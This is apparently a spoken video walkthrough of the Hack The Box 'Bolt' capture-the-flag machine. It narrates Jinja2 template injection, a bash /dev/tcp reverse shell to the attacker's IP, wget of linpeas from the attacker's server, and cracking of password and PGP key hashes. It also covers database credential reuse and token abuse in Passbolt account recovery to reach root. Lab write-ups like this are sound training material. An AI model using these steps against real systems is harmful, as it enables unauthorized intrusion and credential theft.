Well, hello everyone, this is Mohammad Badruddin and today we are going to solve another machine from Hackthebox, and the machine name is Bolt. The difficulty level of this machine is medium, and this machine is pretty awesome because it is very near to the or very close to the real scenario. So without wasting time, let's jump to the machine. And as always, a disclaimer for you that this video and its contents are only for educational purpose and I do not support any unethical or illegal act. That being said, let's go and we start to solve this machine from the first step, which is reconnaissance, and where we actually gather the information as much as possible about the target. So first thing first, I'm going to scan the target with nmap. So nmap space -s capital V for the version enumeration, space -s capital C for the default scripts, and the target IP is 10.10.11.114, and I'm going to save the results of this scan in a file which is default.nmap because I already ran that scan so that I can save the time. Although if you do that scan, it will not take much time. So here in the nmap you will find 3 ports open. One is port number 22, which is default for SSH, and the version is OpenSSH 8.2 P1. Second port is port number 80 HTTP, and the server running on this port is NGINX 1.18.0. There is one more port which is port number 443, and it is default for HTTPS, and the server is same NGINX 1.18.0, and again the operating system it suggested is Ubuntu. So there are chances that the target operating system is Ubuntu, but also there is one more interesting information, which is HTTP title, and as you can see the title name is Passbolt, and this is open source password manager for Teams. So we already have a valid subdomain which is passbolt.bolt.hackthebox, and the base domain name is bolt.hackthebox. So I created a record for these two domains. So if I say grep bolt and /etc/host, so you can see I created two records. One is passbolt.bolt.htb and the second one is bolt.htb. So now let's go and access bolt.htb. I already accessed it. So we have this page, and in that page we found few information which is interesting, and while I was doing that machine I noted down these all the usernames and their roles, because maybe in future penetration testing for this application maybe we need these usernames, or maybe we can go for the open source intelligence about these users and this domain. But here these all the things didn't work for me, so I just brief a bit about so that you have a mindset that each information while penetration testing or testing a target, each information, each single little information can be important, right? So before going to analyze this web application, it's always better to run some background processes, like I'm going to do directory enumeration with the GoBuster. So GoBuster dir space -w for the word list, and I also specify space -z. So the word list I'm going to use is user share word list, and dirbuster, and inside dirbuster there is directory, and directory I'm going to use is 2.3 medium, and space -u to specify the URL, and the URL is going to be bolt.htb, and number of threads I'm going to use is 40. Fine. Also I'm again going to make subdomain enumeration with the GoBuster, and this time I'm going to choose vhost option of the GoBuster, then space -w for the word list, and word list I'm going to use is seclist discovery DNS, and inside DNS I'm going to use subdomain top 1 million this list, then space -u to specify the target URL, so bolt.hackthebox, and space hyphen T again for number of threads, which I'm going to choose 40 and hit enter. Come back to the directory enumeration for the GoBuster, and as you can see, we found these directories. If you go and hover your cursor on the pages, you will find contacts, pricing, services, and download. So download is also here. So if you click to the download, so if you click to this download button, you will find there is one image.tar, and I already downloaded this image, so I don't need that. Also, what is that image.tar file? It is actually the Docker image provided by the Bolt organization to his clients or to any of the user which wants to experience this web application. So you can actually download this image file for the Docker, and you can create the container on the Docker, and you can run this application. You can check the functionality of this application like this. So I already downloaded the image.tar file, so I'm just going to extract this file here. Okay, once we extract this file here and we go inside the image folder, image directory, we will find repository, manifest.json, and all these folders, right? So you must check each of these files. So as you can see in the repository, you will know that this is Flask application. It's using Flask. So if it's using Flask, means it's using Python, right? So let's see more. This is the JSON file. Come to this directory. This is JSON file, and I'm going to open this layer.tar, etc apk word, what's inside Alpine base layout, not interesting. What's inside bin, you can see all these. Python is there, Python 3.6. so it means the web application is using Flask. Going to the another folder, check the JSON file. So as you can see, there is ID, parent, creation date, and the container configuration, all these things, because this is the Docker image file, right? Going to the tar, layer.tar, and root temp, and there is database file, db.sqlite3. So that seems interesting, and I'm going to extract that here. Go to the layer and database db.sqlite. So I don't need now this, so I'm going to close this, clear. And here, as you can see, we found two valid subdomains. So I'm going to take these two subdomains and put it in my record. So also in nmap we have 22 space 80 space 443, and these are two valid subdomains, demo.bold.htb and mail.bold.htb. Okay, now coming here, go to the cd, then cd, and inside cd we have image folder, and inside image folder ls space -la, we have all these. Also I don't need this now, clear, exit this. So if we come into the layer and go back, it was that folder, right? That directory which has 76f2. So come back here and 76f2, this one. So going to that, or just I can say strings, paste that here, slash, inside that there is layer, and inside layer there is db.sqlite3. Hit enter and we found here the username and password for the admin user. Let's take this, copy, come here, new, paste it here, and I don't need this. Save it as admin-hash. Hit enter, come back here, clear, and let's use John space admin hash space -w, and the word list I'm going to use is user share word list, and word list is going to be the rocky.txt. So the password is deadbolt. Now we have the username, and username is this admin add bolt.hackthebox, or just admin is the username and this is the email ID, right? So we have username and we have password. So I'm going to take note it down, admin, and password is deadbolt. Fine. Now come back here and let's try to log in. So the username is admin and the password is deadbolt. And yeah, we logged in. That's good. So I created these two subdomains, record in etc host file, so that we can access that with the name, right? So let's go and check that out. Come back here, http://demo.board.hackthebox, and another subdomain is http://mail.board.hackthebox. Hit enter. Fine. So this is the demo and this is the web mail, right? So if we come to the demo subdomain, and we will find from here we can also create an account, but once we go and create an account, we will find that we need invite code, which we do not have. Okay, no problem. And let's try to log in with the admin user. So let's see, admin and deadbolt, deadbolt. Hit enter. So this user gave us error, invalid login and forbidden. It means we cannot log in from the admin user to this subdomain. Okay. So that we need to create an account. Also there is some chats. Let's see. Hey Sarah, did you have time to check over the Docker image? If not, I will get Eddie to take a look over. Our security team had a concern with it and something about email. Okay. And Sarah replied, I have been so busy, but the design I didn't have time yet. I think Eddie's help is required. Our demo is currently restricted to invite only. So as you can see, we again found few users like Sarah, Alexandra, and a user Eddie. So we have 3 users, and one more thing here to be noted down, which is this invite only, which we already get that here once I try to create the account on the Bolt platform, on the subdomain. So we must have invitation code, but that invitation code, because as this conversation is concerned, you can see it is in the Docker image, and the demo means the demo subdomain is currently restricted to the invite only. So it means we must find out this invitation code in this Docker image. So again, I go and check the another folder, go to the app, and inside app, init.py. Let's see what's here. Nothing interesting. Go back. Layer. Actually, let's just extract it here. So yeah, app, base, and inside base there is template, and these all the templates. Fine. And so actually roots.py is a kind of controller in simple language if you want to understand. So once we see the roots.py, you will see here everything. So this is /login controller part, how a user get login. So method could be get and post /login. Fine. This is to register a user. The method is going to be get and post. So this is same like controller. And also one more thing, if you see the registration part, you will find that you need username, email, and invitation code. And here it checks if the code does not equal to this, it means it is going to give you an error which is 500. So it means this is the invitation code. So we got the invitation code. Let's take this invitation code, go again to this, and let's now create one test user. So test, and here test at bold.htb. Come here, the password is 123456, and the invitation code we have this, right? I agree terms and condition, create account, and yeah, this time it seems successful. So just say test, and the user password is 123456, and good, we logged in here. Also let's try here, log out this user, and let's try to log in with the test user. Test 123456. Yeah, it's login. So admin should also log in from there, but I don't know. But this user can be logged in from both of these applications. One thing also I want to mention here. So once you come to the main page, main demo page, you can see here, this is Jinja, because in my mind, it's using Flask, and we also see the template folder. So what happened, it uses the template engine to actually call the objects and its values. So whatever object you are going to call, the application is going to call the values of that object and put it in the template injection to process it, and finally you will see it as a web page, and all the value comes to the web page. In that way, there is one vulnerability which is server-side template injection. So maybe this application is vulnerable to server-side template injection. And what I was trying to show you, if I go to the page source, and here you will see the title, which is Jinja. If I come here, clear, and if I go on search exploit, and if I say Jinja, so there is vulnerability for the Jinja 2.10 version, and that vulnerability is server-side template injection. So the idea is I am going to try server-side template injection on this application, but how it is going to work, that we need to find out. So I'm going to copy this and put it for my record. Okay, then again, and one more part I'm going to cover here, because this machine is actually practical and also confusing because you are dealing with 3 or 4 domains simultaneously. So we created a test account. Let's see if we can log in to the web client or not. So test 123456 is the password, and as you can see, we can also log in to the web client with the same user account. Now again, I'm going to log in here. Okay. What is the difference between these two? So here, if I go to the profile, so this is the same, but here you will have more options. These emails are not working. These are the dead links. So, but there is a difference. The difference is, if you go to profile on the base domain, you will not found here settings feature, but in demo.bold.hackthebox, in this application, you will find here the setting feature. So if I go to the setting, so here you can actually see something which is very interesting, and it will help you to perform the server-side template injection testing. So email verification is required in order to update personal information. Means whenever you are going to update any information, any personal information, it is going to give you verification through the email. So let's try this. Let's say 7 into 7. Okay, I agree, because this is the format. And if this application is vulnerable to server-side template injection, so the result you will found is 7 into 7, which is 49. So submit this, and as we know that this is going to send you an email. So let's go to the email and refresh this, and as you can see, we got an email. Please confirm your profile changes. So we got a link here. If I go to that link, here there is nothing. In this application, there is nothing changed. So if this application is standalone, maybe the result of server-side template injection you will find here in this part, because we changed the name. But it is going to send you through the email, and that application is connected to the email. So let's refresh again, and you can see we got another email which is saying your profile changes have been confirmed. So if you click on this email, you will find the result of 7 into 7 here. It means the server-side template injection exists with the email functionality. So because now we know that server-side template injection is working, so now we can go and try to get the reverse shell. So for the reverse shell, why I go to the payload all the things, because here we will find more payloads for the server-side template injection. So yeah, server-side template injection, go here and let's try to find out Jinja 2. This is Jinja 2, template format injection, filter bypass. Okay, and this is the payload. So I'm just going to copy this payload, come back to the application, and now as you can see from here, the name has gone. So click on home. This is dead link. Where is profile? No. Okay, so just log out and log in again. Test 1 2 3 4 5 6, and yeah, we have the profile page. /profile, admin /profile. Okay, go to the settings, and this time I'm going to paste that payload, and this payload contains, actually this is remote code execution, and the command we are going to execute is id. So if you want to test, you can test the same exact payload, and once you make once you agree with the terms and condition and submit, you will again find one email with the link, same like that. Once you click and refresh again, you will find another email, confirmation email, and here you will find the ID. But because from this I know that SSTI, server side template injection, is there, so I'm directly going for the reverse shell. Clear nc space hyphen nlvp, which is our listener, and I'm going to start the listener on port 9090. Hit enter, come back here, bash space hyphen I, and then space /dev/tcp and / my IP address. So my IP address is gonna be ifconfig 10.0. Hit enter, 14.76. So 10.10.14.76 / on port number, on which port number I'm going to take the connection, which is 9090. Again 0 greater than and 1. So this is going to be our payload, and just agree the terms and conditions, submit, go back to your email client, wait a moment, or you can refresh it. As you refresh, you will find the email. Click this link and that again take us to the same profile page, but again come here and refresh again, so you will find the confirmation that the changes has confirmed. So actually the payload is not working. Yeah, if the payload worked, we will get the connection here. So let's try something else. Sorry, let's say pen test monkey reverse shell one liner. Okay, come here. You can also get the same payload for the reverse shell on payload all the things. Let's create the payload here first. So my IP is going to be 10.10.14.76 and the port I'm going to use is port number 9090. Then go to the payload all the things, and we need to use this payload. Copy, come back, paste it here, and instead of ID we need to put this. Control X, come here and paste. Fine, that seems pretty well. Copy, go back here and paste that. Agree and just hit enter or submit. Go to the mail client, refresh the email. We found one email. We have the link, click, and this time it seems to be work. So go back to the terminal and we can see we got the session. So ID VR www data. Let's see, and it's confirmed because it's using Flask and Jinja. So there is Python 3. So I'm going to Python 3 space -c and import pty:/pty dot spawn module, then /bin/bash. So now we have a pretty good terminal. Also for the clear command, because right now if I execute clear command, it is not going to execute. So export term is equal to xterm. Now I can execute clear command to see how many users on this machine can run bash. /etc/passwd. Hit enter, and there are two users. One is Eddie and another one is Clark. Uname space -a Linux. Uname space -a. So yeah, Ubuntu. Let's try to see how many connections are there. So net state space hyphen TLPN, and as you can see there is database running, but we don't have the database password, right? So we need to find out some configuration files where we can get the database connection strings, and in which we will get the password. And let's try to find out PASS password config file, team password. So let's try to run the lin piece. So cd/opt and cd peas and lin piece. Then I'm going to start the Python server here. So Python 3 space hyphen m http dot server, hit enter, come here cd/temp and wget space http ://10.10.14.76 which is Kali machine IP, and port number is 8000/linpiece.sh. That seems perfect. Change mode +x and linpiece.sh. Okay, close this, clear, and clear this, and take it here so we have more space. Okay, now let's execute the lin piece. So linpiece.sh, hit enter. It will take some time. While it's running, let's go and try to see the configuration file for passport. So this is actually LAMP server passport team password manager. This is the installation and configuration instruction. So maybe we will get few things. So the first thing, it is going to run the Apache server and Maria server. That is DB, and it's creating the server here. Then downloading the passport image inside var ww. Passport. It is going to generate a GPG key. Passport config passport default.php. The first copy the sample passport configuration file with the following command. So as you can see, the configuration file of passport is passport.php, and it is inside var ww passport config, and this is the file name. And as you can see, the connection string of the database is here. The username is passport, database name is passport db, and the password is password. But this is the default configuration. Maybe we have different configuration here. So also this path may be different for the target machine. So let's just first finish this, and then we will try. Here you can see something I see here. Interesting group writable files. So we have writable files etc passport, and as you can see etc passport gpg, the same structure what we see here, but the only difference is here you have inside var ww passport, and on the target machine you have etc password. Fine. So it means we will find, I hope, in the etc password. So I just cancel. Oh, come on. I also terminate the session. So no problem. Come back here, click the same link, and then let's try to enumerate that directory, which is etc/passboard ls space -la and app.php. As you can see, GPG, which we have seen here before on this. GPG server key. Same things we have here, right? Now, as we can see here, this is the passboard.php, which is the configuration file of passboard. So let's just cat this file, cat passboard.php, hit enter, and we got the database string, which is fantastic. So I'm just going to copy this and put it in our record. Also, I wanna record the directory passboard.php and paste that. Now we have user, we have password and everything. So let's go and access the database first. So clear, and to access the database, that is MySQL space -u, the username is passboard and space -p for the password, space -D for the database. The database is passboard db, and space -h for host, which is going to be the local host or the IP of the local host. Hit enter. It requires password, which is this. Copy, paste it here, hit enter, and we are in. So show database. Actually, we are already in the passboard DB, right? So let's show only tables. Yeah. So account settings, account logs, actions, authentication tokens. Let's see how many users are there. So select star from users, and two users are there. One is Eddie and another one is Clark. So I'm going to take this also for me as record. Fine. What's inside the secret? So description, describe, secrets. I want to see the number of columns in the secrets. So inside secret there is ID, user ID, resource ID, data, create and modified. So let's see what's inside data. So select data from secrets, and this is the data. So again, I'm going to keep this with me, copy and paste it here. Fine. This is GPG. Okay. Another one is the authentication token. So select star from authentication. Where is it? It's better to have copy paste. So paste, and this is the authentication token table. Why this is important or interesting to me? Because here you have authentication token, so maybe these tokens will work for you. So as you can see, in all of these tables we did not find the password. So I'm going to use the same password what we got for the database for the AD user or for the Clark user, because these two users are the valid users what we see before here, like quit. And if I say grep bash /etc/passwd, so as you can see we have Clark and we have AD, both users are valid users. So I'm just going to open new tab, ssh space eddie AD at bolt.htb, hit enter, and yeah, it's asking for the password. And let's try this same password, because sometimes password reuse weakness is there. So the same password user enter for different services, paste it here, hit enter, and good, we got the AD user with the same password as database. So ls space -la, and we have the user.text, so cat users.text, and this is going to be your first flag. Now the thing is here, if I try sudo space -l, it is asking for the password. If we give password, there is nothing you can do. Okay, also we try a bunch of things, but the problem is same, we did not get anything interesting. Also if I try ID, so there is no other groups, fine. But one thing you might have noticed, so let's exit this, clear. If I make SSH for AD user, give the password, this password, okay, hit enter, you will find one thing which is interesting, that is you have email. It means there is email for AD user, and that email mostly exists in where and mail, yeah. So ls space -la, and there is mail for AD. So let's try to read this email. So this email is sent by Clark to AD, and it's saying, hey AD, the password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I cannot recover it. So your private key is the only way to recover your account. That's good. So here 2 points or 3 points to be noted, which is important. Number one, go ahead and download the extension. Extension means it is kind of adds-on or plugins to the browser, right? Because the extension, Clark explained that the extension for the browser. So for the browser, extension means adds-on, same like what we have here, like Foxy Proxy and Cookie. Okay. But which extension it did not describe here. Another important part is to back up your private key because I cannot recover it. So AD must have backed up his private key. So because this is the only way to recover your key. Now the second line says, once you are set up, you can start importing your password. Please be sure to keep good security in mind. And there is a few things I read about in a security white paper that are a little concerning. Clark. Clark said you must backed up your private key. So AD maybe already backed up the private key. Another part is about the extension. So, and here also if you see this part, this passport, now we come to this because it's the email is saying about the password management, and the password management application is Passport, which is a way to get the root account, right? So for example, if I say eddie at bolt.htb, accept the terms and condition, hit enter. It is saying check your email. So, but which email we don't know. Okay, if I come here in this part and if I logged out from here and try to log in with the EDDIE and with this password, it is not going to work. So just copy this and paste here, hit enter, because this client is for this application demo.board.hackthebox. This web client is not for the passboard, so it means we don't have the email client for the passboard. So let's see /temp we have the lin piece or not, ls space -la. No, so we need to upload here the lin piece. So again, I'm going to start the Python server here in this part. Okay, so my Python server is working. Go back to this terminal and wget space http://10.10.14.76 port 8000. Come on. /linpiece.sh. Hit enter. Clear and chmod +x and linpiece. Now let's run the linpiece. Again, it will take a bit time, but 2 points are there. Number one, we need to download the extension on the browser. Number two, we need to backup the AD need to back up the private key. So we need to find out these two things, private key and the extension. So as we can see, our linpiece gave us the possible private SSH keys. So these SSH keys exist here. So if we see home ad.config, then Google Chrome, it means ad was using the Google Chrome and ad user downloaded the passboard extension. So default local extension setting, and inside extension there is one log file. So I'm just going to read this file. Copy this, and the first thing I'm going to take this in my record. So paste it here, come back, clear and cat, paste that file name, and it said there is no such directory. And why it's saying no such directory? Because there are spaces in this directory name. So let's see, cat inside the home directory of AD, and there is .config directory, config. Inside config there is Google Chrome, inside Google Chrome there is default, and inside default there is local extension settings, and there is one more directory, then 0003.log, and this time we get everything but with a lot of gibberish. And as you can see here, we have and PGP public key, so we need the private key, right? Where is the private key? From here it started the private key up to where private key, where it ends. This is the end of the private key block up to here. So just copy this, come here, create one new tab and paste it here. Now you just need to manage this file Okay. So what you need to do is this // and // n is for enter, right? So whenever you see this, just make enter, and here you can see // r// n 2 times. It means there are 2 enter, 1 2, again here, again here. So you just need to manage this. You can also use the commands uh, which can help you to manage this, but this is not too much long, so you can do that. There is something bad because there is some gibberish, so I don't think it will work. Okay, so for this we need to use strings command instead of cat. So strings, hit enter. This is better, so you must take care about that, otherwise you will lose a lot of time. Where is private key? This is the public key and this is the private key. From here all the way this part, end of the private key block, copy this and paste it here. Manage in the same way as I mentioned before. This this here it's 2 times, hit enter, then same like before. Now what you need to do is you just need to delete these values // r// n. So I'm just going to manage this and come back once I finish. So I already managed this file. Now just copy this file, save this file, and let's save it as eddie ad private and gpg file. Fine, and save it. Now go here, clear this one and come back to this. Now we don't need this part. So what I need to do, don't need this, clear, let's say clear gpg to John and eddie ad, where is it, eddie ad private key, and where we are in the image. Okay, so that's why cd ... and clear gpg to John, and here we need to take ad.private key space hyphen, actually save that hash into another file which is ad-hash. Hit enter and it saved the ad hash. So ad-hash, so this is the hash. Now we need to crack this hash with John. So John space hyphen ad hash, and for the word list hyphen w is equal to, let's say /user share word list and rockyou.txt. Hit enter because I already cracked that hash once I completed that machine, so maybe it is here. Yeah, this is the password. The username is Eddie Johnson and the password is Merry Christmas. So this is the password. Although if you crack this hash, you may take 20 minutes or 15 minutes, but it will give you the same password, Merry Christmas. So I just copy this. Now come here and we need to paste it here also. So paste that. Fine. Now we don't need this, we don't need this, we don't need that. Now the problem is here, because it's saying check your mailbox, but we don't have mailbox. So let's try to find out the way. I want to first take that https://pass passbolt dot hackthebox, and I'm going to also start the burp proxy and hit enter so that we can capture the request. This is the burp proxy, passbolt. This is the post request, but we did not post anything. This is another post request. Settings. Okay. Here I'm going to again try eddiead at bolt.htb, accept and hit enter. So user recover. This is the post request, and this is the username, email or username. In the response, this is interesting. We have some information in the response. So if we see the response, there is one ID, success, recovery process started, check your mail. In body, there is again ID, role ID, username, created date. This is the profile ID, and this is the user ID. So this data actually coming from these tables. User ID. This user ID belongs to Eddie, if you see here. Okay. And user ID 4E18. Yeah, this is the user ID which belongs to the Eddie user. Also from here you can confirm this Eddie, and this is the user ID. Okay, but we don't have the email client, so let's see. And also I want to see the request saying user recover. So passbolt user recover, hit enter. How to recover an account? I need this. Now I don't need burp suite. So these are the steps to recover the account. And as Clark sent the email to recover the Eddie's account. So in order to recover, you will need to go to the domain URL /recover at the end of the URL like this, and complete the form by providing your email address, which we have it here before. Yeah, this one. So we just need to give the email address, right? Okay. And follow the link in your mailbox, but we don't have mailbox. This is the issue. Without email, let's see this. Close the burp suite. Okay. Recover account on a network without email. Fine. So what you can do is check in your database for the token relative to the recovery. So copy this, and I am just going to put this here. Come back here, paste it here. So it should be like passbolt passport.bolt.hackthebox. This is gonna be the domain name, setup/recovery, then user ID. So the user ID for the ID is this, right? So take this user ID and put it here. Now we need authentication token. So authentication token for ID, maybe this one, we can check it out. So just copy and paste it here. So copy this, come here, instead of this just paste that. Access to this service requires an invitation. That's not working. Go back here, down, and yeah. So here select token from authentication token where user ID is equal to this. Yeah, okay. So we need to actually find out the token value, and it is going to retrieve the value of authentication token from retrieve the value of the token from authentication underscore tokens table. And we already have access to the database. So we can take this, copy, and come here, put it above it, paste. So here our email is going to be eddie@bolt.htb, and rest of the query is same. So let's go and check this out. So MySQL space hyphen u, which is eddie space hyphen p for the password space hyphen d for the database. Not username is not Eddie, username is passbolt passport, because if you come here, so username is passport and database name is passportdb. So passportdb space hyphen h local host, hit enter, and password is going to be this. So copy, come here, paste that, hit enter. And now we need to select, actually first show tables, okay, and describe authentication underscore token or tokens. So these are the fields. So select token from authentication underscore tokens where user ID, user underscore ID is equal to, and it is going to be in again in the select query. So the select query is like, it is going to take this value from the authentication tokens where the user ID value is again going to be the ID of ID from the users table where username is equal to this, because we found two tables. One is authentication table, here is user ID, and there is one more table which is users. In users you found the username, and in authentication token you will not found the username, you will only found the user ID. So these two tables actually are connected. So ID of this table, ID of this user table is going to be same like user underscore ID here. So I'm going to take this value up to here, copy, and just paste that here, hit enter, and we found the token. So this token is going to be the token for add user. This is the token value, so we need to change it with this. Now copy this and paste it here. Hit enter, and yeah, that works. Now it offer us to actually download the extension for the passport. So just download the extension, add extension, add it. Now we have the extension here, got it. Now here we need to provide the AD private key. So browse it, Hackthebox, bolt, and this is the private key. Hit next, and it is going to ask the passphrase. The passphrase we found is Merry Christmas. Merry Christmas, this one. So copy, come back, paste it here. Remember, until I signed out, verify. Next. And we logged in. So let's see if we can copy. Yeah. So copy this, go back to the AD, come here, quit, and clear su root and password, and we are logged in. So who am I? ID, root, and the host name, and cd/root. Now we can go inside the root, ls space -la, and we have the root flag here. So that's it for this video. But before going to that, I want to just mention one more way of solving this. There is one more way you can actually get the root password. So the way is, as before, once we enumerating the database, we found the data in the secret, right? And this is the data of the secret. So we actually need to decrypt this message. So if you decrypt this message, you will find the root password. And how you will do, because we already cracked the hash for the private key, private GPG key. So we already know that the passphrase of that is Merry Christmas, right? So what you need to do is, the first thing you need to take this and copy it in a separate file. So paste it, and let's just save it as data.asc file. Okay, hit enter. The private key we have here, do it here, clear. So gpg space -batch space -import, and we need to import the AD private key. Fine. Okay, now what we need to do, just we need to decrypt the message. So gpg space -pin entry mode, then loop back, and in the loopback we can define the passphrase, PHRAC. So passphrase, and the passphrase is what? Merry, CHRISTMAS, Merry Christmas, and then space -D and the message file. So the message file is we save it as data.asc. Hit enter, and as you can see here, the password is this, and this is the password for root. So I need to just copy this, and let's try on SSH root at bolt.hackthebox and paste that password. Paste this password, copy, paste it here, hit enter. Not working like that. Just copy this and let's try to switch user, root, and paste the same password what we copied, enter here, and here it's login. So root user actually do not log in with the SSH. So that's it for this video. If you like the content, please like, subscribe and share. And if you have any suggestion or any query, you can write your query in the comment section and I will reply as soon as possible. See you in the next video. Bye.